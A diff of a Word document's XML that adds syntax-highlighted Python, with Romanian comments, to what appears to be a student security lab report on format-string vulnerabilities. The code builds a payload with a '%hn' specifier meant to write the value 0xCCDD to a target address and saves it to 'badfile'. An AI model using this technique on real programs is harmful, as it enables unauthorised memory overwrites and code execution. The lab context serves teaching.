+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> +</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>ftm_between</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)] = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>ftm_between</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>ftm_between</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>###################</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#se al doilea %hn</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>###################</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt_hn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>"%hn"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>encode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>'latin-1'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>#se pune al doilea speficator de tipul %hn care va copia in prima adresa valoarea 0xCCDD</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>intermediate_length</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> +</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt_hn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)] = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>fmt_hn</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="6A9955"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t># Save the format string to file</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>with</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>open</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>'badfile'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>'wb'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>as</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>write</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>content</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:lineRule="atLeast" w:line="285" w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Droid Sans Mono;monospace;monospace" w:hAnsi="Droid Sans Mono;monospace;monospace"/>
+          <w:b w:val="false"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:highlight w:val="black"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="14">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>10160</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="3682365"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="13" name="Image13" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="13" name="Image13" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3682365"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
@@ -1895,6 +5996,20 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
@@ -1937,7 +6052,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId14"/>
+      <w:headerReference w:type="default" r:id="rId15"/>
       <w:type w:val="nextPage"/>
       <w:pgSz w:w="12240" w:h="15840"/>
